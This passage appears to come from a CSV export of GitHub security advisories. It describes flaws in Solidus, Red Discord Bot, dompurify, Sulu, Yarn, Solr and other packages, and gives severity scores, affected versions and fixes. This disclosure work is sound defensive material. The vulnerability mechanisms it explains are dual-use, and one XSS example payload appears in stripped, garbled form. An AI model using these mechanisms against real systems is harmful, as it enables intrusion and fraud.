+> You cannot ship products in some zones and you are relying on Solidus Shipping Method building only to filter out unwanted zones. Malicious users can enter an allowed zone's address and change back to an unwanted one in the payment step by crafting a request with some proper ship_address_attributes.
+
+This problem comes from how checkout permitted attributes are structured. We have a single list of attributes that are permitted across the whole checkout, no matter the step that is being submitted.
+
+### Patches
+
+A PR has been attached to fix the security concern for each of all the Solidus supported versions following the rules of the [Solidus Security Policy](https://solidus.io/security).
+
+### Workarounds
+
+When it's not possible to upgrade to a supported patched version, please use this gist to patch the store:
+
+https://gist.github.com/kennyadsl/4618cd9797984cb64f7700a81bda889d","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'solidus_frontend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.6'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_frontend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.6'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_frontend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.0'}, {'fixed': '2.10.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.6'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.6'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.0'}, {'fixed': '2.10.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus/security/advisories/GHSA-3mvg-rrrw-m7ph'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15109'}, {'type': 'WEB', 'url': 'https://gist.github.com/kennyadsl/4618cd9797984cb64f7700a81bda889d'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/solidus_api/CVE-2020-15109.yml'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/solidus_frontend/CVE-2020-15109.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/solidusio/solidus'}, {'type': 'WEB', 'url': 'https://solidus.io/blog/2020/07/16/new-releases.html'}]","{'cwe_ids': ['CWE-20', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-04T20:54:07Z', 'nvd_published_at': '2020-08-04T23:15:00Z'}"
+1.4.0,GHSA-55j9-849x-26h4,2021-11-19T15:35:36Z,2020-08-21T16:30:52Z,,['CVE-2020-15140'],Remote Code Execution in Red Discord Bot,"### Impact
+A RCE exploit has been discovered in the Trivia module: this exploit allows Discord users with specifically crafted usernames to inject code into the Trivia module's leaderboard command. By abusing this exploit, it's possible to perform destructive actions and/or access sensitive information.
+
+### Patches
+This critical exploit has been fixed on version 3.3.11.
+
+### Workarounds
+Unloading the Trivia module with ``unload trivia`` can render this exploit not accessible. We still highly recommend updating to 3.3.11 to completely patch this issue.
+
+### References
+https://github.com/Cog-Creators/Red-DiscordBot/pull/4175
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Cog-Creators/Red-DiscordBot](https://github.com/Cog-Creators/Red-DiscordBot)
+* Over on our [Discord server](https://discord.gg/red)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Red-DiscordBot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/security/advisories/GHSA-55j9-849x-26h4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15140'}, {'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/pull/4175/commits/9ab536235bafc2b42c3c17d7ce26f1cc64482a81'}, {'type': 'PACKAGE', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-21T16:30:30Z', 'nvd_published_at': '2020-08-21T17:15:00Z'}"
+1.4.0,GHSA-m75h-cghq-c8h5,2021-09-23T20:56:01Z,2020-08-31T22:51:50Z,,['CVE-2013-6393'],Heap Based Buffer Overflow in libyaml,"Versions 0.2.2 and earlier depend on native libyaml version 0.1.5 or earlier. As such, they are affected by a heap-based buffer overflow vulnerability that may result in a crash or arbitrary code execution when parsing YAML tags.
+
+
+
+
+
+## Recommendation
+
+- Update to version 0.2.3 that includes a version of LibYAML that contains a fix for this issue.",[],"[{'package': {'ecosystem': 'npm', 'name': 'libyaml'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-6393'}, {'type': 'PACKAGE', 'url': 'https://bitbucket.org/xi/libyaml'}, {'type': 'WEB', 'url': 'https://bitbucket.org/xi/libyaml/commits/bce8b60f0b9af69fa9fab3093d0a41ba243de048'}, {'type': 'WEB', 'url': 'https://bitbucket.org/xi/libyaml/commits/tag/0.1.5'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/attachment.cgi?id=847926&action=diff'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1033990'}, {'type': 'WEB', 'url': 'https://puppet.com/security/cve/cve-2013-6393'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT6536'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20140302205713/http://www.securityfocus.com/bid/65258'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20150523055002/http://www.mandriva.com/en/support/security/advisories/advisory/MDVSA-2015:060/?name=MDVSA-2015:060'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/21'}, {'type': 'WEB', 'url': 'http://advisories.mageia.org/MGASA-2014-0040.html'}, {'type': 'WEB', 'url': 'http://archives.neohapsis.com/archives/bugtraq/2014-04/0134.html'}, {'type': 'WEB', 'url': 'http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html'}, {'type': 'WEB', 'url': 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-6393'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-updates/2014-02/msg00064.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-updates/2014-02/msg00065.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-updates/2015-02/msg00078.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-updates/2016-04/msg00050.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2014-0353.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2014-0354.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2014-0355.html'}, {'type': 'WEB', 'url': 'http://www.debian.org/security/2014/dsa-2850'}, {'type': 'WEB', 'url': 'http://www.debian.org/security/2014/dsa-2870'}, {'type': 'WEB', 'url': 'http://www.ubuntu.com/usn/USN-2098-1'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:08:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-49rv-g7w5-m8xx,2021-09-23T19:08:01Z,2020-08-28T21:24:59Z,,['CVE-2017-18635'],Cross-Site Scripting in @novnc/novnc,"Versions of `@novnc/novnc` prior to 0.6.2 are vulnerable to Cross-Site Scripting (XSS). The package fails to validate input from the remote VNC server such as the VNC server name. This allows an attacker in control of the remote server to execute arbitrary JavaScript in the noVNC web page. It affects any users of `include/ui.js` and users of `vnc_auto.html` and `vnc.html`.
+
+
+## Recommendation
+
+Upgrade to version 0.6.2 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@novnc/novnc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18635'}, {'type': 'WEB', 'url': 'https://github.com/novnc/noVNC/issues/748'}, {'type': 'WEB', 'url': 'https://github.com/novnc/noVNC/commit/6048299a138e078aed210f163111698c8c526a13#diff-286f7dc7b881e942e97cd50c10898f03L534'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0754'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/horizon/+bug/1656435'}, {'type': 'WEB', 'url': 'https://github.com/ShielderSec/cve-2017-18635'}, {'type': 'PACKAGE', 'url': 'https://github.com/novnc/noVNC'}, {'type': 'WEB', 'url': 'https://github.com/novnc/noVNC/releases/tag/v0.6.2'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2019/10/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/12/msg00024.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NOVNCNOVNC-469136'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4522-1/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1204'}, {'type': 'WEB', 'url': 'https://www.shielder.it/blog/exploiting-an-old-novnc-xss-cve-2017-18635-in-openstack/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-28T21:21:28Z', 'nvd_published_at': '2019-09-25T23:15:00Z'}"
+1.4.0,GHSA-h698-r4hm-w94p,2021-09-23T20:58:30Z,2020-08-31T22:54:56Z,,['CVE-2014-10067'],Validation Bypass in paypal-ipn,"Versions 2.x.x and earlier of `paypal-ipn` are affected by a validation bypass vulnerability.
+
+paypal-ipn uses the `test_ipn` parameter (which is set by the PayPal IPN simulator) to determine if it should use the production PayPal site or the sandbox.
+
+A motivated attacker could craft a request string using the simulator to fool the application into entering the sandbox mode, potentially allowing purchases without valid payment.
+
+
+## Recommendation
+
+Upgrade to version 3.0.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'paypal-ipn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-10067'}, {'type': 'WEB', 'url': 'https://github.com/andzdroid/paypal-ipn/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/andzdroid/paypal-ipn'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/26'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:08:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-86qr-9vqc-pgc6,2021-10-21T20:51:16Z,2020-08-05T14:53:06Z,,['CVE-2020-5413'],Code execution in Spring Integration,"Spring Integration framework provides Kryo Codec implementations as an alternative for Java (de)serialization. When Kryo is configured with default options, all unregistered classes are resolved on demand. This leads to the ""deserialization gadgets"" exploit when provided data contains malicious code for execution during deserialization. In order to protect against this type of attack, Kryo can be configured to require a set of trusted classes for (de)serialization. Spring Integration should be proactive against blocking unknown ""deserialization gadgets"" when configuring Kryo in code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.integration:spring-integration-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.23'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.integration:spring-integration-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.integration:spring-integration-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.integration:spring-integration-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5413'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-integration/commit/6a02b5abe97fabab6003d51b98dd45ab009a6e05'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-integration'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2020-5413'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-03T21:06:31Z', 'nvd_published_at': '2020-07-31T20:15:00Z'}"
+1.4.0,GHSA-2828-9vh6-9m6j,2021-09-23T19:00:16Z,2020-08-21T16:25:48Z,,['CVE-2020-6173'],Client Denial of Service on TUF,"### Impact
+An attacker who can gain file access to the repository and modify metadata files may cause a denial of service to clients by creating many invalid signatures on a metadata file. Having a large number of signatures to verify will delay the moment when the client will determine the signature is not valid. This delay may be for at least a few minutes, but possibly could be longer especially if multiple files are impacted.
+
+The tuf maintainers would like to thank Erik MacLean of Analog Devices, Inc. for reporting this issue.
+
+### Patches
+No fix exists for this issue.
+
+### Workarounds
+No workarounds are known for this issue.
+
+### References
+* [CVE-2020-6173](https://nvd.nist.gov/vuln/detail/CVE-2020-6173)
+* [Issue #973](https://github.com/theupdateframework/tuf/issues/973)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tuf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.13.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/security/advisories/GHSA-2828-9vh6-9m6j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6173'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/issues/973'}, {'type': 'PACKAGE', 'url': 'https://github.com/theupdateframework/tuf'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/commits/develop'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-21T16:19:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7wgr-7666-7pwj,2021-01-07T23:41:29Z,2020-08-20T14:38:13Z,,['CVE-2020-15141'],Path Traversal in openapi-python-client,"### Impact
+Path traversal vulnerability. If a user generated a client using a maliciously crafted OpenAPI document, it is possible for generated files to be placed in arbitrary locations on disk.
+
+Giving this a CVSS score of 3.0 (Low) with CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N/E:P/RL:U/RC:C
+
+### Patches
+A fix is being worked on for version 0.5.3
+
+### Workarounds
+Inspect OpenAPI documents before generating clients for them.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [openapi-python-client](https://github.com/triaxtec/openapi-python-client/issues)
+* Email us at [danthony@triaxtec.com](mailto:danthony@triaxtec.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'openapi-python-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/triaxtec/openapi-python-client/security/advisories/GHSA-7wgr-7666-7pwj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15141'}, {'type': 'WEB', 'url': 'https://github.com/triaxtec/openapi-python-client/commit/3e7dfae5d0b3685abf1ede1bc6c086a116ac4746'}, {'type': 'WEB', 'url': 'https://github.com/triaxtec/openapi-python-client/blob/main/CHANGELOG.md#053---2020-08-13'}, {'type': 'WEB', 'url': 'https://pypi.org/project/openapi-python-client'}, {'type': 'WEB', 'url': 'https://pypi.org/project/openapi-python-client/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-14T16:08:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-crf2-xm6x-46p6,2021-11-19T15:36:13Z,2020-08-19T18:02:36Z,,['CVE-2020-15151'],Observable Timing Discrepancy in OpenMage LTS,"### Impact
+This vulnerability allows to circumvent the **formkey protection** in the Admin Interface and increases the attack surface for **Cross Site Request Forgery** attacks
+
+### Patches
+The latest OpenMage Versions up from 19.4.6 and 20.0.2 have this Issue solved
+
+
+### References
+Related to Adobes CVE-2020-9690 ( https://helpx.adobe.com/security/products/magento/apsb20-47.html )
+fixed in Magento2 https://github.com/magento/magento2/commit/52d72b8010c9cecb5b8e3d98ec5edc1ddcc65fb4
+as part of 2.4.0/2.3.5-p2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-crf2-xm6x-46p6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15151'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/commit/7c526bc6a6a51b57a1bab4c60f104dc36cde347a'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenMage/magento-lts'}, {'type': 'WEB', 'url': 'https://helpx.adobe.com/security/products/magento/apsb20-47.html'}]","{'cwe_ids': ['CWE-203', 'CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-19T18:02:10Z', 'nvd_published_at': '2020-08-20T01:17:00Z'}"
+1.4.0,GHSA-chqj-j4fh-rw7m,2023-09-13T18:51:44Z,2020-08-28T21:25:11Z,,['CVE-2019-16728'],Cross-Site Scripting in dompurify,"Versions of `dompurify` prior to 2.0.3 are vulnerable to Cross-Site Scripting (XSS). The package has an XSS filter bypass due to Mutation XSS in both Chrome and Safari through a combination of ``/`` elements and `
`/``. An example payload is: ` "">`. This allows attackers to bypass the XSS protection and execute arbitrary JavaScript in a victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 2.0.3 or later. You may also disallow `` and `` through `dompurify` configurations:
+```DOMPurify.sanitize(input, {
+ FORBID_TAGS: ['svg', 'math']
+ });```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dompurify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16728'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html'}, {'type': 'WEB', 'url': 'https://research.securitum.com/dompurify-bypass-using-mxss/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1205'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-28T21:24:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wfm4-pq59-wg6r,2021-01-07T23:41:55Z,2020-08-05T21:27:44Z,,['CVE-2020-15132'],Reset Password / Login vulnerability in Sulu,"### Impact
+
+_What kind of vulnerability is it? Who is impacted?_
+
+This vulnerability consists of a few related issues:
+
+#### Forget password leaks information if the user exists
+
+When the ""Forget password"" feature on the login screen is used, Sulu asks the user for a username or email address. If the given string is not found, a response with a `400` error code is returned, along with a error message saying that this user name does not exist:
+
+```json
+{
+ ""code"": 0,
+ ""message"": ""Entity with the type \u0022Sulu\\Bundle\\SecurityBundle\\Entity\\User\u0022 and the id \u0022asdf\u0022 not found.""
+}
+```
+
+This enables attackers to retrieve valid usernames.
+
+#### Forgot password leaks user email if user exists
+
+The response of the ""Forgot Password"" request returns the email address to which the email was sent, if the operation was successful:
+
+```json
+{""email"":""admin@localhost.local""}
+```
+
+This information should not be exposed, as it can be used to gather email addresses.
+
+#### Response time of login gives hint if the username exists
+
+If the username the user enters in the login screen does not exists, the request responds much faster than if the username exists. This again allows attackers to retrieve valid usernames.
+
+#### Reset Token for Forgot Password feature is not hashed
+
+The reset token in the user database table is not hashed. That means that somebody could try to request a new password using the Forgot Password feature, and look that up in the database, if the attacker somehow got access to the database. Hashing the reset token would fix that problem.
+
+### Patches
+
+This problem was fixed in Release 1.6.34, 2.0.10 and 2.1.1.
+
+### Workarounds
+
+Override the files manually in your project and change them accordingly.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.34'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.10'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-wfm4-pq59-wg6r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15132'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/0fbb6009eb6a8efe63b7e3f3b4b886dc54bb2326'}]","{'cwe_ids': ['CWE-209'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-05T21:26:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gr4j-r575-g665,2021-09-23T19:06:33Z,2020-08-25T14:04:47Z,,[],Cross-Site Scripting in highcharts,"Versions of `highcharts` prior to 7.2.2 or 8.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize `href` values and does not restrict URL schemes, allowing attackers to execute arbitrary JavaScript in a victim's browser if they click the link.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N/'}]","[{'package': {'ecosystem': 'npm', 'name': 'highcharts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'highcharts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/highcharts/highcharts/issues/13559'}, {'type': 'PACKAGE', 'url': 'https://github.com/highcharts/highcharts'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HIGHCHARTS-571995'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1227'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-25T14:01:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v6fx-752r-ccp2,2023-08-25T22:21:14Z,2020-08-05T14:53:43Z,,['CVE-2020-16253'],PgHero gem allows CSRF,"The PgHero gem through 2.6.0 for Ruby allows CSRF. PgHero normally uses the `protect_from_forgery` method from Rails to prevent CSRF. However, this defaults to `:null_session`, which has no effect on non-session based authentication methods. Thus the ruby gem is vulnerable with non-session based authentication methods like basic authentication.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'pghero'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16253'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pghero/issues/330'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pghero/commit/14b67b32fed19a30aaf9826ee72f2a29cda604e9'}, {'type': 'PACKAGE', 'url': 'https://github.com/ankane/pghero'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pghero/CVE-2020-16253.yml'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-05T14:51:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5xf4-f2fq-f69j,2023-09-08T22:40:47Z,2020-02-14T23:10:16Z,,['CVE-2019-10773'],Yarn Improper link resolution before file access (Link Following),"In Yarn before 1.21.1, the package install functionality can be abused to generate arbitrary symlinks on the host filesystem by using specially crafted ""bin"" keys. Existing files could be overwritten depending on the current user permission set.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'yarn'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.22.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.21.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10773'}, {'type': 'WEB', 'url': 'https://github.com/yarnpkg/yarn/issues/7761#issuecomment-565493023'}, {'type': 'WEB', 'url': 'https://github.com/yarnpkg/yarn/pull/7755'}, {'type': 'WEB', 'url': 'https://github.com/yarnpkg/yarn/commit/039bafd74b7b1a88a53a54f8fa6fa872615e90e7'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0475'}, {'type': 'WEB', 'url': 'https://blog.daniel-ruf.de/critical-design-flaw-npm-pnpm-yarn/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3HIZW4NZVV5QY5WWGW2JRP3FHYKZ6ZJ5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ITY5BC63CCC647DFNUQRQ5AJDKUKUNBI/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-YARN-537806,'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-13T21:01:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-ww97-9w65-2crx,2021-03-31T21:03:54Z,2020-02-12T18:45:28Z,,['CVE-2019-17558'],Improper Input Validation in Apache Solr,"Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '8.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.5.5'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': 